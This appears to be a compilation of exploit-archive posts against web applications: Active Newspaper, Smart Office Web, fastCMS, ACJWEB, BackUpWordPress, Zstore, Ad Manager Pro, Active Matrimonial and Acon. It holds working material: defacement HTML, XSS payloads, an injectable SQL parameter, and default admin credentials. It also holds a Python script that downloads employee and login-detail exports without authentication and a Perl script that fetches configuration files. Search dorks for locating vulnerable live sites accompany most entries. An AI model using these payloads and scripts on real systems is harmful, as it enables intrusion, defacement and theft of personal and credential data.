<pre><code>====================================================================================================================================<br />| # Title : Active Newspaper v2.0 HTML inject Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : https://activeitzone.com/demo/newspaper_v2.0/ | <br />| # Dork : n/a |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Register new member .<br /><br />[+] Go to edit your profile https://127.0.0.1/activeitzonecom/demo/newspaper_v2.0/home/profile<br /><br />[+] Edit your profile, put your code or use this code for test in the First Name field or Last Name or ...etc :<br /><br /><marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /></tr><br /><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a><br /></tr><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | <br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)<br /># Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office"<br /># Date: 09/Dec/2022<br /># Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)<br /># Vendor Homepage: https://smartofficepayroll.com/<br /># Software Link: https://smartofficepayroll.com/downloads<br /># Version: Smart Office Web 20.28 and before<br /># CVE Number : CVE-2022-47075 and CVE-2022-47076<br /># CVSS : 7.5 (High)<br /># Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/<br /># Vulnerability Description:<br /># Smart Office Web 20.28 and before allows Remote Information Disclosure (Unauthenticated) via insecure direct object reference (IDOR). This was fixed in a later version except for ExportEmployeeDetails.<br /><br />import wget<br />import os<br />from colorama import Fore, Style<br /><br />def download_file(url, filename):<br /> wget.download(url, filename)<br /><br /># Disclaimer<br />print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.")<br />print("The author takes no responsibility for any unauthorized usage.")<br />print("Please use this script responsibly and adhere to the legal and ethical guidelines.")<br /><br />agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ")<br />if agree != "1":<br /> print("You have chosen not to agree. Exiting the script.")<br /> exit()<br /><br /># Print name in red<br />name = "Exploit by Tejas Nitin Pingulkar"<br />print(Fore.RED + name)<br />print(Style.RESET_ALL) # Reset color<br /><br />website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ")<br />target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ")<br />folder_name = input("Enter the folder name to save the files: ")<br /><br /># Create the folder if it doesn't exist<br />if not os.path.exists(folder_name):<br /> os.makedirs(folder_name)<br /><br />urls_filenames = []<br /><br />if target_version == "1":<br /> urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"))<br />else:<br /> urls_filenames.extend([<br /> (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),<br /> (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"),<br /> (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"),<br /> (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv")<br /> ])<br /><br />print("CVE-2022-47076: Obtain user ID and password from downloaded source")<br /><br />for url, filename in urls_filenames:<br /> download_file(url, os.path.join(folder_name, filename))<br /><br /># Print "for more such interesting exploits, visit cvewalkthrough.com" in red<br />print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com")<br />print(Style.RESET_ALL) # Reset color<br /> <br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://fastcms.net/ │<br />│ Vendor : fastCMS │<br />│ Software : fastCMS Blogging 3.1.0 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Allows an attacker to inject malicious code into the website, giving the ability to │<br />│ steal sensitive information, manipulate data, and launch additional attacks. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />-----------------------------------------------<br />POST /demo/blog-post/599/how-to-choose-the-perfect-university-for-a-career-in-medicine/ HTTP/2<br /><br />name=cracker&email=[anything]&website=[anything]&comment=[XSS Payload]&submit=<br />-----------------------------------------------<br /><br />POST parameter 'comment' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. Visit any [Categorie] (as Guest)<br />2. Scroll down to [Leave a Reply]<br />3. Inject your [XSS Payload] in the "Comments Window"<br />4. Press [Post Comment]<br /><br />5. When the admin visits [Comments] to check [Pending Comments] at this path (https://website/admin/modules/comments/comments.php?page=pending)<br />6. The XSS fires and executes in the admin's browser<br /><br />[-] Done<br /></code></pre>
<pre><code>======================================================================================|<br />| # Title : ACJWEB DESIGNER v 1.0 XSS Vulnerability |<br />| # Author : indoushka | <br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : aluizio81@gmail.com |<br />| # Dork : inurl:sobre.php?id= |<br />======================================================================================|<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : busca.php?pag=2'%22()%26%25<ScRiPt%20>prompt(947548)</ScRiPt><br /><br />[+] http://127.0.0.1/www/asmac.combr/busca.php?pag=2'%22()%26%25<ScRiPt%20>prompt(947548)</ScRiPt><br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress BackUpWordPress 3.8 Plugins Backup Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : https://wordpress.org/plugins/backupwordpress/ | <br />| # Dork : "/wp-content/backupwordpress- " |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] The plugin appears to leave backups in a world-accessible directory under the document root.<br /><br />[+] Use Dork : "/wp-content/backupwordpress- "<br /><br />[+] The search result gives you some websites that earlier took a WordPress backup.<br /><br />[+] http://127.0.0.1/WordPress3/wp-content/backupwordpress-89c0bd0079-backups/<br /><br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Zstore version 6.5.4 Database Disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://github.com/leon-mbs/zstore/releases/tag/6.5.4 | <br />| # Dork : "Zippy склад" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download database backup :<br /><br /> This file may disclose sensitive information. This information can be used to launch further attacks.<br /> <br />[+] Dorking in Google or other search engine.<br /><br />[+] Save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br /># Author : indoushka<br /><br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print "\n[+] Zstore version 6.5.4 Database Disclosure [+] \n\n";<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[+] Author : indoushka \n\n";<br />print "[-] How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/db.sql \n";<br />print "[+] usage2 : perl $0 localhost /db.sql \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="config/config.ini";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/db.sql");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/.env\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Ad Manager Pro 3.05 Backup Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit) | <br />| # Vendor : http://www.P30vel.ir | <br />| # Dork : |<br />====================================================================================================================================<br /><br />P0C :<br /><br />[+] Appears to leave backups in a world-accessible directory under the document root; the plugin exports a backup as a text file that contains sensitive information.<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : /admanager/data/<br /><br />[+] https://127.0.0.1/localhost/admanager/data/<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Active Matrimonial CMS v 1.4 HTML inject Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : https://activeitzone.com/ | <br />| # Dork : "Copyright © 2019 Active Matrimonial CMS - All Rights Reserved " |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Register new member .<br /><br />[+] Go to edit your profile http://127.0.0.1/xywarscom/home/profile<br /><br />[+] In the Introduction box, put your code or use this code for test :<br /><br /><marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /></tr><br /><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a><br /></tr><br /><br />====Greetings to :===================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=====================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Acon - Architecture and Construction Website CMS v1.2 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.mother-of-mangrove.com/xicia/cc/acon/ | <br />| # Dork : Acon - Building and Architecture Website CMS |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings in place<br /> during the installation of the script and using the default username and password<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use login : Username: admin@gmail.com & Password: 1234 <br /><br />[+] http://127.0.0.1/www/demoslycom/xicia/cc/acon/admin/<br /><br /> <br />====Greetings to :===================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=====================================================================================================================================<br /></code></pre>
<pre><code>======================================================================================|<br />| # Title : ACJWEB DESIGNER 1.0 - SQL Injection Vulnerability |<br />| # Author : indoushka | <br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : aluizio81@gmail.com |<br />| # Dork : inurl:sobre.php?id= |<br />======================================================================================|<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : http://127.0.0.1/asmac.combr/sobre.php?id= <======inject here<br /><br />[+] login = login.php<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />=======================================================================================================================================<br /></code></pre>